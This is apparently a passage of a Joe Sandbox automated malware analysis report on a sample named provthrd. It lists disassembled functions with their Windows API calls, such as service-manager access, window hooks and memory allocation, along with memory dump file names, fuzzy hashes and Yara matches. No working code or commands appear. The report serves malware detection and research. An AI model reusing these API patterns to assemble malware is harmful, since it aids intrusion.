Opcode Fuzzy Hash: 26d4d459fa1a0931cbb80bb0b300241d3c137dbc239fcad77beb05456f757867
Instruction Fuzzy Hash: 85B1B131B183118FEB24AFA59C4872F76EAAFC8740F504929FA55DB3D0EA74DD009782

Function 00909530 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 201
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,00000480), ref: 009096D1
OpenSCManagerW.SECHOST(00000000,00000000,000F003F,?,33A6B453,?,?), ref: 009097A0

Strings

p^Qw, xrefs: 009096A5, 009096C4
y7@+, xrefs: 009097DF

Memory Dump Source

Source File: 00000002.00000002.2728407033.0000000000901000.00000020.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.2728350113.0000000000900000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2728435540.000000000090D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_provthrd.jbxd

Yara matches

Similarity

API ID: AllocateHeapManagerOpen
String ID: p^Qw$y7@+
API String ID: 963794170-2585053815
Opcode ID: 69db42e2110e414c0ba29993e82dbd015ab37d6289930ad2e6bcd3cff1973307
Instruction ID: 428320ac269bb30f48aaad0847331b4d23de00620b55047bd95c1a354a64e064
Opcode Fuzzy Hash: 69db42e2110e414c0ba29993e82dbd015ab37d6289930ad2e6bcd3cff1973307
Instruction Fuzzy Hash: 5E71CE707193018FD758DF78AC9572B72A9ABC4B00F10482DF549DB2D2EA74DD09DB92

Function 0044B3CB Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(?,?,?,0044B3C6), ref: 0044B442
GetProcessVersion.KERNELBASE(00000000,?,?,?,0044B3C6), ref: 0044B47F
LoadCursorA.USER32(00000000,00007F02), ref: 0044B4AD
LoadCursorA.USER32(00000000,00007F00), ref: 0044B4B8

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: CursorLoadVersion$Process
String ID:
API String ID: 2246821583-0
Opcode ID: 27059771b43d753aa87d0c8afb5767cf09eb86d94b91e0dc31e339111e6195d2
Instruction ID: 61447e28742b9c37f9121ee1e7ef2b18fb52499020237da44fe629e5fb2c2d4e
Opcode Fuzzy Hash: 27059771b43d753aa87d0c8afb5767cf09eb86d94b91e0dc31e339111e6195d2
Instruction Fuzzy Hash: 96118FB1A00B509FD728DF3A989452ABBE5FB887057104D3FE18BC6B91D7B8E400CB94

Function 00909860 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 149
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstChangeNotificationW.KERNELBASE(?,00000000,00000001), ref: 009098DB

Strings

Ma:, xrefs: 009099C9
Ma:, xrefs: 009099B4

Memory Dump Source

Source File: 00000002.00000002.2728407033.0000000000901000.00000020.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.2728350113.0000000000900000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2728435540.000000000090D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_provthrd.jbxd

Yara matches

Similarity

API ID: ChangeFindFirstNotification
String ID: Ma:$Ma:
API String ID: 1065410024-930586552
Opcode ID: 8d614046d644153adeb6f3d5c4b6e8ca2d2130460c82db84b001da27b8f02682
Instruction ID: 56574c0fb1867f31e90b1c8da5a751e9ff2382e1e6922c7e0fb2c3fae46d30ed
Opcode Fuzzy Hash: 8d614046d644153adeb6f3d5c4b6e8ca2d2130460c82db84b001da27b8f02682
Instruction Fuzzy Hash: 974163707182018FDB58EFB89D91B7B32ADABD4700B14892EF555CB3D2EA34CD059792

Function 009052E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(33A6B453,33A6B453), ref: 009053C0

Strings

5sF, xrefs: 00905378
5sF, xrefs: 0090530B

Memory Dump Source

Source File: 00000002.00000002.2728407033.0000000000901000.00000020.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.2728350113.0000000000900000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2728435540.000000000090D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_provthrd.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: 5sF$5sF
API String ID: 1721193555-3318035110
Opcode ID: 04705b04d28856111335e058f939d7e9c5397cda8ca11f3a1cf44f3ba4e1dd42
Instruction ID: 5435883b0784a33e78996c5834e8005d9a45a40193efe9341c829495a1b77d33
Opcode Fuzzy Hash: 04705b04d28856111335e058f939d7e9c5397cda8ca11f3a1cf44f3ba4e1dd42
Instruction Fuzzy Hash: 4C210471614640CFCB28866C99842BF76D89FC4384F56093AF55ACB2E1E678CE805B83

Function 00905B40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,00040000), ref: 00905B9B
RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00905C0A

Strings

p^Qw, xrefs: 00905B6F, 00905B8E

Memory Dump Source

Source File: 00000002.00000002.2728407033.0000000000901000.00000020.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.2728350113.0000000000900000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2728435540.000000000090D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_provthrd.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFree
String ID: p^Qw
API String ID: 2488874121-1100543152
Opcode ID: 9778db63e3dd2524d62680f382056e79f31bab4be222b6ccc44ec93dc05d97e4
Instruction ID: 9941e6321d6cee6dd2df1a04cbb2030f0a8f92becdf9907dc7629d0530f8b696
Opcode Fuzzy Hash: 9778db63e3dd2524d62680f382056e79f31bab4be222b6ccc44ec93dc05d97e4
Instruction Fuzzy Hash: 4511B230B257104FDB64ABB99C51B2F76EEAFC8A50B04843AF508CB3D1EE24DD025B91

Function 0041ED68 Relevance: 5.1, APIs: 4, Instructions: 53
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapReAlloc.KERNEL32(00000000,00000060,?,00000000,0041EB30,?,?,?,0000E0DF), ref: 0041ED90
HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,0041EB30,?,?,?,0000E0DF), ref: 0041EDC4
VirtualAlloc.KERNELBASE(00000000,00100000,00002000,00000004,?,00000000,0041EB30,?,?,?,0000E0DF), ref: 0041EDDE
HeapFree.KERNEL32(00000000,?,?,00000000,0041EB30,?,?,?,0000E0DF), ref: 0041EDF5

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: AllocHeap$FreeVirtual
String ID:
API String ID: 3499195154-0
Opcode ID: 299f3c4eb023eede72354afa9ffec15b36968518cba468086cb03dd7c672fd85
Instruction ID: 3917a33a731a4f26c8ddd7dc5ffd53177df06919f1deb2cddf1dc0f74a425bd6
Opcode Fuzzy Hash: 299f3c4eb023eede72354afa9ffec15b36968518cba468086cb03dd7c672fd85
Instruction Fuzzy Hash: 83114974200601EFC730CF59FC449A27BB6FB853147104939F692C61B2E7A0988ADF59

Function 008C002D Relevance: 4.9, APIs: 3, Instructions: 387
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,008C0005), ref: 008C00E9
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,008C0005), ref: 008C0111

Memory Dump Source

Source File: 00000002.00000002.2728136517.00000000008C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_provthrd.jbxd

Yara matches

Similarity

API ID: AllocInfoNativeSystemVirtual
String ID:
API String ID: 2032221330-0
Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
Instruction ID: 2fed71ab071dc191f3e5d8d2248bea4c47581d8be7d24f90237553d78b5a53f7
Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
Instruction Fuzzy Hash: 9FD19A71A08746CBDB248F69C884B6AB3F0FF94388F18852DE995CB241E774E845CF91

Function 004063C0 Relevance: 4.6, APIs: 3, Instructions: 138threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00405CF0: GetVersion.KERNEL32 ref: 00405CF3
Part of subcall function 00405CF0: GetVersionExA.KERNEL32(00000000), ref: 00405D32

SystemParametersInfoA.USER32(00001022,00000000,?,00000000), ref: 0040BA54
GetCurrentThreadId.KERNEL32 ref: 0040BBB3
SetWindowsHookExA.USER32(00000004,0040C390,00000000,00000000), ref: 0040BBC3

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: Version$CurrentHookInfoParametersSystemThreadWindows
String ID:
API String ID: 72105273-0
Opcode ID: 1d7b24dff864bfbb398358bee1fd572c78d0ed037ffe63afc53e26ca092672fa
Instruction ID: 3c3346149ad313b162e0c066c67798ba01387fea516911bb939508601704bcdb
Opcode Fuzzy Hash: 1d7b24dff864bfbb398358bee1fd572c78d0ed037ffe63afc53e26ca092672fa
Instruction Fuzzy Hash: 8F414CB0B943043AFA1076715D4BF2A21A5CB40B09F60043FBA45FA5C2EEFDF85446AE

Function 00909A90 Relevance: 4.6, APIs: 3, Instructions: 95stringCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,00000104), ref: 00909B3A
QueryFullProcessImageNameW.KERNELBASE(00000000), ref: 00909B3D
lstrcmpiW.KERNELBASE(?,?,0DFA437B,?), ref: 00909BCE

Memory Dump Source

Source File: 00000002.00000002.2728407033.0000000000901000.00000020.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.2728350113.0000000000900000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2728435540.000000000090D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_provthrd.jbxd

Yara matches

Similarity

API ID: Process$CurrentFullImageNameQuerylstrcmpi
String ID:
API String ID: 3605714105-0
Opcode ID: e06462207eba44c9a392cbbfa64673e6ba2a39ec262d18cd5e8a10de7867c993
Instruction ID: edda1a3b8f7e2728e24acfdde2f43e670d9413be222218ace955a021d9001ec6
Opcode Fuzzy Hash: e06462207eba44c9a392cbbfa64673e6ba2a39ec262d18cd5e8a10de7867c993
Instruction Fuzzy Hash: FE31E6717242004FDB68ABA9AC81B7B33DDABC8760F51842BF546CB3D2DA74CD059B91

Function 00903060 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,00000220), ref: 009031CB

Strings

p^Qw, xrefs: 009031BE

Memory Dump Source

Source File: 00000002.00000002.2728407033.0000000000901000.00000020.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.2728350113.0000000000900000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2728435540.000000000090D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_provthrd.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: p^Qw
API String ID: 1279760036-1100543152
Opcode ID: acd9dbc8211bfff3b5cb2d7fd322f81f6b5b28e52952f770d7a5d117b98adeaf
Instruction ID: 73bb6732285a732418dd4647ad31b123c7098be90746ed1973cd39b05748e24c
Opcode Fuzzy Hash: acd9dbc8211bfff3b5cb2d7fd322f81f6b5b28e52952f770d7a5d117b98adeaf
Instruction Fuzzy Hash: 885181717083018FCB58DF68949466EBBE9ABD8340F108D2EF556C73D1DB34DA4A8792

Function 00909BF0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 88threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,00909860,00000000,00000000,00000000,33A6B453,00906695), ref: 00909D11

Strings

p^Qw, xrefs: 00909C45, 00909C64

Memory Dump Source

Source File: 00000002.00000002.2728407033.0000000000901000.00000020.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.2728350113.0000000000900000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2728435540.000000000090D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_provthrd.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: p^Qw
API String ID: 2422867632-1100543152
Opcode ID: 1e96b32aea756bd9d45a90024949c497fdf84fc1cb83da76da52d0af2dac5ed6
Instruction ID: d4a7f848d3d52059b7dc84a2d56bf2a08da5877d38b96cec74bb361453a5c109
Opcode Fuzzy Hash: 1e96b32aea756bd9d45a90024949c497fdf84fc1cb83da76da52d0af2dac5ed6
Instruction Fuzzy Hash: D4219570B593109FEAA8DB759D16B2E32D96BD4B00F10882AF649DF3D1EA30DD019745

Function 0044BF51 Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000000,00000000,0043685F,00000000,00000000,00000000,00000000,?,00000000,?,0042B77C,00000000,00000000,00000000,00000000,0041AB45), ref: 0044BF5A
SetErrorMode.KERNELBASE(00000000,?,00000000,?,0042B77C,00000000,00000000,00000000,00000000,0041AB45,00000000), ref: 0044BF61

Part of subcall function 0044BFB4: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 0044BFE5
Part of subcall function 0044BFB4: lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 0044C086
Part of subcall function 0044BFB4: lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 0044C0B3

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: ErrorMode$FileModuleNamelstrcatlstrcpy
String ID:
API String ID: 3389432936-0
Opcode ID: 0d9cdd44b9239cd40bc16e390169594cb2ecb7642703e43259d9f4463124c3c6
Instruction ID: 93c088ae3ad283a255a7ad2aba602553389a053c0a27788d3ab1f72d441cef74
Opcode Fuzzy Hash: 0d9cdd44b9239cd40bc16e390169594cb2ecb7642703e43259d9f4463124c3c6
Instruction Fuzzy Hash: DDF049749143118FEB14EF25D445A4A7BE8AF48714F15848FF4489B3A2CB78D844CFAA

Function 0043428A Relevance: 3.0, APIs: 2, Instructions: 27threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0043429D
SetWindowsHookExA.USER32(000000FF,004345DF,00000000,00000000), ref: 004342AD

Part of subcall function 0044B1B7: __EH_prolog.LIBCMT ref: 0044B1BC

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: CurrentH_prologHookThreadWindows
String ID:
API String ID: 2183259885-0
Opcode ID: 70fb75fef07ce0378a57383cbd503d996d654f82368ffc9c67712eecc2d0be4b
Instruction ID: 42c4c9652d243a8e5e0f7fe85461ab7b302250681256a049a1242e2575c7fa57
Opcode Fuzzy Hash: 70fb75fef07ce0378a57383cbd503d996d654f82368ffc9c67712eecc2d0be4b
Instruction Fuzzy Hash: 99F02031D003006BFB303B74AC09BAA36509B44365F15025FF512AB1E2EF6CAC80C39E

Function 0041E68F Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,0041AAC3,00000001), ref: 0041E6A0

Part of subcall function 0041E6CB: HeapAlloc.KERNEL32(00000000,00000140,0041E6B4), ref: 0041E6D8

HeapDestroy.KERNEL32 ref: 0041E6BE

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: Heap$AllocCreateDestroy
String ID:
API String ID: 2236781399-0
Opcode ID: 46416b415a1529b366a30996abd9f665a1de8c64c38805810ae3f64269dc9b8b
Instruction ID: a24c2dcacfa0da71c6b0bab1f0de9c476a85ba2cff2a23164a7b47a4eae0a3d2
Opcode Fuzzy Hash: 46416b415a1529b366a30996abd9f665a1de8c64c38805810ae3f64269dc9b8b
Instruction Fuzzy Hash: F1E012746113019AEB205B73BD097B636D49B54782F808876F845C91F1E7B4C580AF1A

Function 00403500 Relevance: 1.6, APIs: 1, Instructions: 134COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040364B

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 3ef8fa902811f37a227f982be95726e24abe72f9fc45eb8cf27ef255a7508ab6
Instruction ID: a7515e18ae772762c3a573cf8702573f3b008f407889140e989f148f1847eb7b
Opcode Fuzzy Hash: 3ef8fa902811f37a227f982be95726e24abe72f9fc45eb8cf27ef255a7508ab6
Instruction Fuzzy Hash: B441913560C3829FC304CF2998905AABFE5AF9D204F488A7EF4C997352D635DA06CB56

Function 008E1D10 Relevance: 1.6, APIs: 1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2728197966.00000000008E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 008E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8e1000_provthrd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3514caa41a7269384b5af6d607a41430a459774b5a36a359d327e5e3dee72f29
Instruction ID: 3cd2013865219a8079c494ce9af73d3f72ae7662c1a652b5652bd37d8d2722ec
Opcode Fuzzy Hash: 3514caa41a7269384b5af6d607a41430a459774b5a36a359d327e5e3dee72f29
Instruction Fuzzy Hash: B441B474A00249AFDB44CF45C498BAAB7B2FB89314F24C199EC199F355C775EE82CB80

Function 009045C0 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,33A6B453), ref: 0090462F

Memory Dump Source

Source File: 00000002.00000002.2728407033.0000000000901000.00000020.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.2728350113.0000000000900000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2728435540.000000000090D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_provthrd.jbxd

Yara matches

Similarity

API ID: FullImageNameProcessQuery
String ID:
API String ID: 3578328331-0
Opcode ID: 4880de924452a5a87c7f375bd48d9e60f8ae44f92dacebd39b05bfa5b8907d02
Instruction ID: 5f8b381827008ddea3a0098579f0a2ab670e980bc815a28c1402be9b3298b3d7
Opcode Fuzzy Hash: 4880de924452a5a87c7f375bd48d9e60f8ae44f92dacebd39b05bfa5b8907d02
Instruction Fuzzy Hash: F60122B1B252004FD394ABB8DC01F6B62DD9FC4B10F054029B209CB2C0EA70CD015390

Function 00905410 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 009054B1

Memory Dump Source

Source File: 00000002.00000002.2728407033.0000000000901000.00000020.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.2728350113.0000000000900000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2728435540.000000000090D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_provthrd.jbxd

Yara matches

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: cd1e79943f715993ac633937b741a46edd4f486110cf1ecac76d68da8a615bd7
Instruction ID: e35efe7a0095474df30494304f4e39a782f2f77dffbf2e39e6a660f62538b718
Opcode Fuzzy Hash: cd1e79943f715993ac633937b741a46edd4f486110cf1ecac76d68da8a615bd7
Instruction Fuzzy Hash: FD117C306147009FE324EF60C842BAB73B9AF84700F95881CA655CB1E0EBB8DD84CB52

Function 00906CD0 Relevance: 1.5, APIs: 1, Instructions: 45libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(00000000,?,33A6B453,00906F05,?,33A6B453,009068AC), ref: 00906D00

Memory Dump Source

Source File: 00000002.00000002.2728407033.0000000000901000.00000020.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.2728350113.0000000000900000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2728435540.000000000090D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_provthrd.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 50b17207d0ffac069c1b3e0ad0c7184ff71a76f5401ceb07f2c11fdbfa26b7a4
Instruction ID: 71c3fdf4e067dd6266a06ef62363477257d9d4a5db9923e4a0044bc43a6a0a71
Opcode Fuzzy Hash: 50b17207d0ffac069c1b3e0ad0c7184ff71a76f5401ceb07f2c11fdbfa26b7a4
Instruction Fuzzy Hash: D501FB30B292504FD754ABB99C51B2B36EEAFC9640700842AE619CB7D1EB34DD02AB91

Function 00909878 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindFirstChangeNotificationW.KERNELBASE(?,00000000,00000001), ref: 009098DB

Memory Dump Source

Source File: 00000002.00000002.2728407033.0000000000901000.00000020.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.2728350113.0000000000900000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2728435540.000000000090D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_provthrd.jbxd

Yara matches

Similarity

API ID: ChangeFindFirstNotification
String ID:
API String ID: 1065410024-0
Opcode ID: e5fc6282d55074e8733104f50b9885adf911fdc9c8d94181227597d04db921c9
Instruction ID: 70b62ee6af7c1dc68c70a804b2c9a540b916264140ae0c786a6d5df45b0359e0
Opcode Fuzzy Hash: e5fc6282d55074e8733104f50b9885adf911fdc9c8d94181227597d04db921c9
Instruction Fuzzy Hash: 62018130B182058FCA789B78898577A32ADABC5740F104D1DF5A9CB3E2EB34CD01A792

Function 0041A3A8 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,0041A38C,000000E0,0041A379,?,00403512,0000E0DF), ref: 0041A3ED

Part of subcall function 0041E57A: InitializeCriticalSection.KERNEL32(00000000,?,?,?,0041A3BD,00000009,?,?,0041A38C,000000E0,0041A379,?,00403512,0000E0DF), ref: 0041E5B7
Part of subcall function 0041E57A: EnterCriticalSection.KERNEL32(?,?,?,0041A3BD,00000009,?,?,0041A38C,000000E0,0041A379,?,00403512,0000E0DF), ref: 0041E5D2

Part of subcall function 0041E5DB: LeaveCriticalSection.KERNEL32(?,0041A82B,00000009,?,0041E5C6,00000000,?,?,?,0041A3BD,00000009,?,?,0041A38C,000000E0,0041A379), ref: 0041E5E8

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
